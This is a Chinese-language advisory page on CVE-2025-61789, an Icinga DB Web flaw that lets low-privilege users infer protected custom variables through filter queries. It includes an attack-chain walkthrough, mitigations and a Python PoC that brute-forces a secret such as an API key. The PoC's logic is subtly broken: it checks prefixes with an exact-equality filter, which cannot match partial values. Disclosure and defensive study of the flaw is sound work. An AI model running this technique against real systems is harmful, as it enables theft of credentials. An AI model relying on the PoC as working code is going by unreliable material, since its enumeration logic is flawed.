CVE-2025-61789 Icinga DB Web 受保护变量信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-61789

漏洞类型

信息泄露/权限绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Icinga DB Web

漏洞概述

CVE-2025-61789 是 Icinga DB Web（Icinga 监控系统的图形化界面组件）中存在的一个信息泄露漏洞。该漏洞允许已授权但权限受限的用户通过在过滤器中使用受保护或被列入黑名单的自定义变量（custom variables），以间接方式猜测或推断出这些变量的实际值。Icinga DB Web 提供了两种机制来保护敏感的自定义变量：一是 `icingadb/protect/variables` 配置项用于保护变量不被直接访问，二是 `icingadb/denylist/variables` 配置项用于将变量列入拒绝访问列表。然而，在 1.1.4 和 1.2.3 之前的版本中，这两种保护机制都存在缺陷，攻击者可以利用过滤器功能绕过这些保护措施。该漏洞的 CVSS 评分为 5.3，属于中等严重等级。虽然攻击需要低权限认证（PR:L），但攻击复杂度较高（AC:H），且无需用户交互（UI:N），通过网络即可发起攻击。该漏洞主要影响系统的机密性（C:H），对完整性和可用性没有影响。该漏洞由 GitHub 安全团队通过 GitHub Security Advisories 渠道报告，并在 2025 年 10 月 16 日公开披露。Icinga 团队已在新版本中修复了此问题，修复后的版本会在检测到使用受保护或被列入黑名单的自定义变量时返回错误响应，从而阻止信息泄露。

技术细节

Icinga DB Web 是 Icinga 2 监控系统的 Web 前端组件，提供了直观的图形化界面用于展示监控数据。在 Icinga 监控系统中，管理员可以为主机和服务定义自定义变量（custom variables），这些变量可能包含敏感信息，如 API 密钥、密码或其他机密数据。为保护这些敏感信息，Icinga DB Web 提供了两种配置机制：

1. `icingadb/protect/variables`：用于指定哪些自定义变量受到保护，不允许普通用户查看其值。
2. `icingadb/denylist/variables`：用于将特定的自定义变量列入拒绝访问列表。

漏洞的根本原因在于，当授权用户在过滤器（filter）中使用这些受保护或被列入黑名单的自定义变量时，系统没有正确地阻止该操作。相反，系统会根据过滤器条件返回匹配的结果，攻击者可以通过观察返回结果的数量或其他特征来推断变量的实际值。例如，攻击者可以构造类似 `vars.sensitive_var == "guess_value"` 的过滤器，通过二分查找或暴力枚举的方式逐步缩小变量值的范围，最终推断出完整的变量值。

这种攻击方式本质上是一种基于布尔/盲注的信息泄露技术（Blind Information Disclosure）。修复方案是在版本 1.1.4 和 1.2.3 中增加了对过滤器中使用受保护变量的检测，当检测到此类操作时，系统会直接返回错误响应，从而阻止信息泄露通道。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者首先需要获取 Icinga DB Web 的一个低权限账户。该账户需要具备访问 Icinga DB Web 的基本权限，但不需要管理员权限。攻击者可以通过社会工程、钓鱼攻击或利用其他漏洞获取此类账户。

STEP 2

步骤2：识别受保护的自定义变量

通过查看 Icinga 配置文件或通过其他渠道，攻击者识别出目标系统中被 `icingadb/protect/variables` 或 `icingadb/denylist/variables` 保护的自定义变量名称。这些变量通常包含敏感信息，如 API 密钥、密码等。

STEP 3

步骤3：构造过滤器查询

攻击者在 Icinga DB Web 的过滤器中使用受保护的自定义变量，构造类似 `vars.protected_var == "guess"` 的查询条件。由于漏洞的存在，系统不会阻止此类查询。

STEP 4

步骤4：盲注式信息推断

通过观察系统对不同猜测值的响应差异（如返回结果的数量、响应时间等），攻击者采用二分查找或逐字符暴力枚举的方式，逐步推断出受保护变量的实际值。

STEP 5

步骤5：提取敏感信息

成功推断出受保护变量的值后，攻击者获取了原本不应访问的敏感信息，如 API 密钥、密码等，可用于进一步的攻击活动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61789 PoC - Icinga DB Web Protected Variable Information Disclosure
# This PoC demonstrates how an authorized user can guess values of protected
# custom variables through filter-based blind information disclosure.

import requests

# Configuration
TARGET_URL = "https://icinga-db-web.example.com"
USERNAME = "low_priv_user"
PASSWORD = "user_password"
PROTECTED_VAR = "secret_api_key"  # The protected custom variable name
TARGET_OBJECT = "hostname.example.com"  # Target host/service to query

# Step 1: Authenticate to Icinga DB Web
session = requests.Session()
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
session.post(f"{TARGET_URL}/authentication/login", data=login_data)

# Step 2: Exploit - Use filter with protected variable to guess its value
# The vulnerability allows using protected vars in filters, and the response
# differs based on whether the guessed value matches the actual value.

def check_filter_value(session, guess_value):
    """
    Craft a filter using the protected variable and check if the guess is correct.
    In vulnerable versions, the server returns different responses based on
    whether the filter condition matches.
    """
    filter_expr = f"host.name==\"{TARGET_OBJECT}\"&&vars.{PROTECTED_VAR}==\"{guess_value}\""
    params = {
        "filter": filter_expr,
        "columns": "host.name"
    }
    response = session.get(f"{TARGET_URL}/icingadbweb/host/list", params=params)
    
    # If the result set is non-empty, the guessed value is correct
    # In vulnerable versions, this bypasses the protection mechanism
    return response.json()

# Step 3: Blind enumeration of the protected variable value
# Use character-by-character brute force or binary search
def enumerate_variable():
    discovered_value = ""
    charset = "abcdefghijklmnopqrstuvwxyz0123456789_-{}@!#$%^&*"
    
    for position in range(50):  # Max length assumption
        found_char = None
        for char in charset:
            test_value = discovered_value + char
            result = check_filter_value(session, test_value)
            # Check if the filter matched (indicating prefix is correct)
            if result and len(result.get("results", [])) > 0:
                # Try extending to confirm
                test_extended = test_value + charset[0]
                result_ext = check_filter_value(session, test_extended)
                if not result_ext or len(result_ext.get("results", [])) == 0:
                    found_char = char
                    break
        
        if found_char is None:
            break
        discovered_value += found_char
        print(f"Discovered so far: {discovered_value}")
    
    return discovered_value

# Note: In fixed versions (1.1.4 / 1.2.3), the server returns an error
# when protected variables are used in filters, preventing this attack.
if __name__ == "__main__":
    print("CVE-2025-61789 PoC - Protected Variable Information Disclosure")
    print(f"Target: {TARGET_URL}")
    print(f"Protected Variable: {PROTECTED_VAR}")
    # value = enumerate_variable()
    # print(f"Discovered value: {value}")

影响范围

Icinga DB Web < 1.1.4

Icinga DB Web 1.2.0 - 1.2.2

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1) 审查所有 Icinga DB Web 用户账户，确保只有必要的低权限账户存在；2) 监控 Web 服务器和 Icinga DB Web 的访问日志，关注异常的过滤器查询模式；3) 在反向代理（如 Nginx 或 Apache）层面添加规则，阻止包含受保护变量名的查询请求；4) 将敏感的自定义变量从配置中移除或重新命名，降低被攻击者识别的风险；5) 实施网络层面的访问控制，限制 Icinga DB Web 的访问来源。